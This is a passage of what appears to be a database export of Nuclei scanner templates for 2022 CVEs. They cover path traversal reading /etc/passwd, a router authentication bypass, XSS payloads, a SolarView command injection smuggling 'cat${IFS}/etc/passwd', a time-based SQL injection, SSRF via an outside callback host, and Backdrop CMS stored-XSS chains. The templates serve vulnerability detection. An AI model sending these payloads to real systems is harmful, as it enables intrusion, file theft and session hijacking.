\"{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd\"\n - \"{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd\"\n\n stop-at-first-match: true\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n# digest: 4a0a00473045022100e98a87c4d16d7f1e1f4e3bd878e6b85448431976ad3ab893d2ce311bfbe051b002203da7fdd5c7a3b5bb0627aa18f2b5a7366a66ad2b2de1a34d774c059b20bd28d3:922c64590222798bb761d5b6d8e72950", "hash": "adde88f591c37569b85930996fa9d159", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308595" }, "name": "CVE-2022-40843.yaml", "content": "id: CVE-2022-40843\n\ninfo:\n name: Tenda AC1200 V-W15Ev2 - Authentication Bypass\n author: gy741\n severity: medium\n description: |\n The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. 
This vulnerability exists within the local web and hosted remote management console.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.\n reference:\n - https://boschko.ca/tenda_ac1200_router\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 4.9\n cve-id: CVE-2022-40843\n cwe-id: CWE-287\n epss-score: 0.40937\n epss-percentile: 0.97197\n cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\\(1576\\):*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tenda\n product: w15e_firmware\n tags: cve2022,cve,tenda,auth-bypass,router,iot\n\nhttp:\n - raw:\n - |\n GET /goform/downloadSyslog/syslog.log HTTP/1.1\n Host: {{Hostname}}\n Cookie: W15Ev2_user=\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - '^0\\d{3}$'\n\n - type: word\n part: body\n words:\n - \"[system]\"\n - \"[error]\"\n - \"[wan1]\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"Content-type: config/conf\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d2aad06ddab3ccd6e666e1cc53a8974249101d2a25b364fb4b96543189e71c450220673c9fddd115564cbbe4faa07d9de703be2cd6af8eede2a57e4408e9ba10d5af:922c64590222798bb761d5b6d8e72950", "hash": "59d41088764891577785ec5e46777623", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308596" }, "name": "CVE-2022-40879.yaml", "content": "id: CVE-2022-40879\n\ninfo:\n name: kkFileView 4.1.0 - Cross-Site Scripting\n author: arafatansari,co5mos\n severity: medium\n description: |\n kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. 
An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/389\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40879\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-40879\n cwe-id: CWE-79\n epss-score: 0.03708\n epss-percentile: 0.91567\n cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n tags: cve,cve2022,kkFileView,xss,keking\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ==\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '=PQ

    '\n - '该文件不'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022002d0aafae336d011a0a74b01352143f57a21e65003ac86e0ea9563934522d3c80220494bc3ac1854a6da8d5cc61b7c8b2b0158429cb26e83ab3f628b90e2dfb751a6:922c64590222798bb761d5b6d8e72950", "hash": "605870f8385a3c327dde8c5fe992a32e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308597" }, "name": "CVE-2022-40881.yaml", "content": "id: CVE-2022-40881\n\ninfo:\n name: SolarView 6.00 - Remote Command Execution\n author: For3stCo1d\n severity: critical\n description: |\n SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.\n remediation: |\n Apply the latest patch or upgrade to a non-vulnerable version of SolarView.\n reference:\n - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php\n - https://github.com/advisories/GHSA-wx3r-88rg-whxq\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40881\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-40881\n cwe-id: CWE-77\n epss-score: 0.96169\n epss-percentile: 0.99389\n cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contec\n product: solarview_compact_firmware\n shodan-query: http.favicon.hash:\"-244067125\"\n tags: cve,cve2022,solarview,rce,lfi,contec\nvariables:\n cmd: \"cat${IFS}/etc/passwd\"\n\nhttp:\n - raw:\n - |\n POST /network_test.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n host=%0a{{cmd}}%0a&command=ping\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100cf7cdba34d65b8edb10f08b9b4c8fe7f62ad2f48374d0ebc15d7f2bfbda8b361022100db8d88fc5035579a5be45602c1ebb9ac2daf06fa12f71eea28888fc63f5242b8:922c64590222798bb761d5b6d8e72950", "hash": "818102cecc1ae555eba77720f4665926", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308598" }, "name": "CVE-2022-4117.yaml", "content": "id: CVE-2022-4117\n\ninfo:\n name: WordPress IWS Geo Form Fields <=1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the affected WordPress site.\n remediation: |\n Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193\n - https://wordpress.org/plugins/iws-geo-form-fields/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4117\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4117\n cwe-id: CWE-89\n epss-score: 0.03413\n epss-percentile: 0.9123\n cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: iws-geo-form-fields_project\n product: iws-geo-form-fields\n framework: 
wordpress\n tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")'\n condition: and\n# digest: 490a004630440220527f8e6fc57bb3c042da2a2145f63f88cab3db7eeb282091c66cf526cd9b36e30220586c5e71de7bd30a22f81171809aba45884a19aea6b85a63181ef2de54f14d63:922c64590222798bb761d5b6d8e72950", "hash": "dd53c887a91ca70d52fb5de082f15a32", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308599" }, "name": "CVE-2022-4140.yaml", "content": "id: CVE-2022-4140\n\ninfo:\n name: WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access\n author: theamanrawat\n severity: high\n description: |\n WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. 
The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can access sensitive files on the server, potentially exposing sensitive information.\n remediation: Fixed in version 2.8.5.\n reference:\n - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7\n - https://wordpress.org/plugins/usc-e-shop/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4140\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-4140\n cwe-id: CWE-552\n epss-score: 0.00932\n epss-percentile: 0.82572\n cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: collne\n product: welcart_e-commerce\n framework: wordpress\n tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"\\\\[(font|extension|file)s\\\\]\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950", "hash": "1f80c9b77ab1eda80271c8f412cee76c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859a" }, "name": "CVE-2022-41412.yaml", "content": "id: CVE-2022-41412\n\ninfo:\n name: perfSONAR 4.x <= 4.4.4 - Server-Side 
Request Forgery\n author: null_hypothesis\n severity: high\n description: |\n An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.\n reference:\n - https://github.com/renmizo/CVE-2022-41412\n - https://hackerone.com/reports/2445802\n - https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb\n - https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html\n - http://packetstormsecurity.com/files/170069/perfSONAR-4.4.4-Open-Proxy-Relay.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2022-41412\n cwe-id: CWE-918\n epss-score: 0.0012\n epss-percentile: 0.45431\n cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: perfsonar\n product: perfsonar\n fofa-query: title=\"perfSONAR Toolkit\"\n verified: true\n tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n -

    Interactsh Server

    \n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e598e38759b6d2c7b34ecb326730371101115feee22f2e9a4e8ecf3fdb09f45902204532d257a96dbe274009bfc99b23ace1c08d5824445578aed77faf1654dc813e:922c64590222798bb761d5b6d8e72950", "hash": "b409d272413bf06ad3576b8b3671a3b8", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859b" }, "name": "CVE-2022-41441.yaml", "content": "id: CVE-2022-41441\n\ninfo:\n name: ReQlogic v11.3 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n ReQlogic v11.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-41441\n - https://okankurtulus.com.tr/2023/01/17/reqlogic-v11-3-unauthenticated-reflected-cross-site-scripting-xss/\n - http://packetstormsecurity.com/files/171557/ReQlogic-11.3-Cross-Site-Scripting.html\n - http://reqlogic.com\n - https://reqlogic.com/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-41441\n cwe-id: CWE-79\n epss-score: 0.00155\n epss-percentile: 0.5093\n cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: reqlogic\n product: reqlogic\n shodan-query: http.html:\"ReQlogic\"\n tags: cve,cve2022,packetstorm,xss,reqlogic\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=\"\n - \"{{BaseURL}}/ProcessWait.aspx?POBatch=&WaitDuration=3\"\n\n stop-at-first-match: true\n redirects: true\n matchers:\n - type: 
dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body_2, \"\") && contains(body_2, \"POProcessTimeout\")'\n condition: and\n# digest: 4b0a004830460221009639948683a1cbabebf7e7ebb27e2e1f72a571fd097c09de93b67ea65d95f021022100f0953cb6c21404e57e03e89f6d3b1956c83911cb12cad4bef5b21c86d957ece6:922c64590222798bb761d5b6d8e72950", "hash": "f66e6f16519e7407adf26def62cc7c33", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859c" }, "name": "CVE-2022-41473.yaml", "content": "id: CVE-2022-41473\n\ninfo:\n name: RPCMS 3.0.2 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the website.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability.\n reference:\n - https://github.com/ralap-z/rpcms/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2022-41473\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-41473\n cwe-id: CWE-79\n epss-score: 0.012\n epss-percentile: 0.84884\n cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: 'rpcms'\n product: 'rpcms'\n shodan-query: http.html:\"RPCMS\"\n tags: cve,cve2022,rpcms,xss,'rpcms'\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'rpcms'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950", "hash": "6d00f436ea8d25855e47cb1af5da04d8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859d" }, "name": "CVE-2022-41840.yaml", "content": "id: CVE-2022-41840\n\ninfo:\n name: Welcart eCommerce <=2.7.7 - Local File Inclusion\n author: theamanrawat\n severity: critical\n description: |\n Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated directory traversal (CWE-22): the progressfile parameter of functions/progress-check.php is not confined to its intended directory, so an unauthenticated attacker can read arbitrary files from the web server (this template reads /etc/passwd and checks the response for the root entry).\n impact: |\n This file-read vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n remediation: |\n Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability\n - https://wordpress.org/plugins/usc-e-shop/\n - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve\n - https://nvd.nist.gov/vuln/detail/CVE-2022-41840\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-41840\n cwe-id: CWE-22\n epss-score: 0.00738\n epss-percentile: 0.78774\n cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: collne\n product: welcart_e-commerce\n framework: wordpress\n 
tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f9dea7e19767e917eccb890bdc7a4b6effb2a1942275ba6bd15aa0362dc6b584022008f8c2bd3da536ba3f893eb70585ac286a8fb272343f3bb94fc865f1fceb68fc:922c64590222798bb761d5b6d8e72950", "hash": "02b8d76219f9eff34af66c5fcbeef92e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859e" }, "name": "CVE-2022-42094.yaml", "content": "id: CVE-2022-42094\n\ninfo:\n name: Backdrop CMS version 1.23.0 - Stored Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. Exploitation requires an authenticated account that is allowed to create Card content; this template logs in with the supplied username and password and saves a new Card node using the full_html text format, so it leaves content behind on the target and should be treated as intrusive.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/backdrop/backdrop/releases/tag/1.23.0\n - https://github.com/bypazs/CVE-2022-42094\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42094\n - https://backdropcms.org\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2022-42094\n cwe-id: CWE-79\n epss-score: 0.0071\n epss-percentile: 0.80039\n cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:*\n metadata:\n verified: 
true\n max-request: 4\n vendor: backdropcms\n product: backdrop\n tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms\n\nhttp:\n - raw:\n - |\n GET /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n - |\n GET /?q=node/add/card HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=node/add/card HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"title\"\n\n {{randstr}}\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n 0\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n 1\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"changed\"\n\n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"form_build_id\"\n\n {{form_id_2}}\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"form_token\"\n\n {{form_token}}\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"form_id\"\n\n card_node_form\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"body[und][0][value]\"\n\n \n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"body[und][0][format]\"\n\n full_html\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"status\"\n\n 1\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; 
name=\"name\"\n\n {{name}}\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"date[date]\"\n\n 2023-04-13\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"date[time]\"\n\n 21:49:36\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"path[auto]\"\n\n 1\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"comment\"\n\n 1\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n ------WebKitFormBoundaryWEcZgRB4detkrGaY\n Content-Disposition: form-data; name=\"op\"\n\n Save\n ------WebKitFormBoundaryWEcZgRB4detkrGaY--\n\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - Backdrop CMS\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: form_id_1\n group: 1\n regex:\n - name=\"form_build_id\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: name\n group: 1\n regex:\n - name=\"name\" value=\"(.*?)\"\n internal: true\n\n - type: regex\n name: form_id_2\n group: 1\n regex:\n - name=\"form_build_id\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: form_token\n group: 1\n regex:\n - name=\"form_token\" value=\"(.*)\"\n internal: true\n# digest: 4a0a00473045022100833759ad52afd13abc5b49fcd770918213699021dbc4ed1ad7e66372e0f0548302201073403909a88ddab9ad7c88c79479b903f7d8b8dced717e7d8d0e89a6f05b3d:922c64590222798bb761d5b6d8e72950", "hash": "413ef23702f355e153d0fc35cdd4aae4", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859f" }, "name": "CVE-2022-42095.yaml", "content": "id: CVE-2022-42095\n\ninfo:\n name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)\n author: theamanrawat\n severity: medium\n description: |\n Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via 
the Page content.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/backdrop/backdrop/releases/tag/1.23.0\n - https://github.com/bypazs/CVE-2022-42095\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42095\n - https://backdropcms.org\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2022-42095\n cwe-id: CWE-79\n epss-score: 0.00283\n epss-percentile: 0.65226\n cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: backdropcms\n product: backdrop_cms\n tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms\n\nhttp:\n - raw:\n - |\n GET /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n - |\n GET /?q=node/add/page HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=node/add/page HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n - |\n POST /?q={{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_5 == 200\"\n - \"contains(header_5, 'text/html')\"\n - 'contains(body_5, \"\")'\n - \"contains(body_5, 'Backdrop CMS')\"\n condition: and\n\n extractors:\n - type: regex\n name: form_id_1\n group: 1\n regex:\n - 'name=\"form_build_id\" value=\"(.*)\"'\n internal: true\n\n - type: regex\n name: form_id_2\n group: 1\n regex:\n - 'name=\"form_build_id\" value=\"(.*)\"'\n internal: true\n\n - type: regex\n name: form_token\n group: 1\n regex:\n - 'name=\"form_token\" value=\"(.*)\"'\n internal: true\n# digest: 490a004630440220034fd820495574945439e0f2771b2d730d3e01fc650ba5df79aa66b3e608f66f0220265468d28c9449a6e73199f71f1dc5cbdba0efdb3834a6dc0642156047d88771:922c64590222798bb761d5b6d8e72950", "hash": "f5048b9b1359010f4486d24b7c102c0c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a0" }, "name": "CVE-2022-42096.yaml", "content": "id: CVE-2022-42096\n\ninfo:\n name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)\n author: theamanrawat\n severity: medium\n description: |\n Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.\n remediation: |\n Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.\n 
